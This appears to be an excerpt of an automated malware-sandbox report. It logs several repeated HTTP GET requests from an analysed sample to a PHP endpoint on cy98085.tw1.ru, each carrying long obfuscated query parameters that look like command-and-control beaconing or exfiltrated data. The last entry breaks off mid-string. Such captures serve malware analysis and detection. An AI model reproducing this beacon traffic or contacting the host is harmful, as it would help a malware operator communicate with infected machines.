            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&53aa3a9fb57d34776a6131d2274538b1=QX9JSUmlWTYpFc41WW0ZlMjpnRFl0d502YsJlbipkQTVWeGdlYwpESVNGeGRGb10GTwolMipXOtNmasdlYjhnVLJzZEV2bBl3Ysh3VhdkQTJGaKNjW2pESVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIlFGOzYWZhdjM4kzMmVmNlJGN5MzMhZ2MxEjZ5EGN5U2YjRmY0M2NxIiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2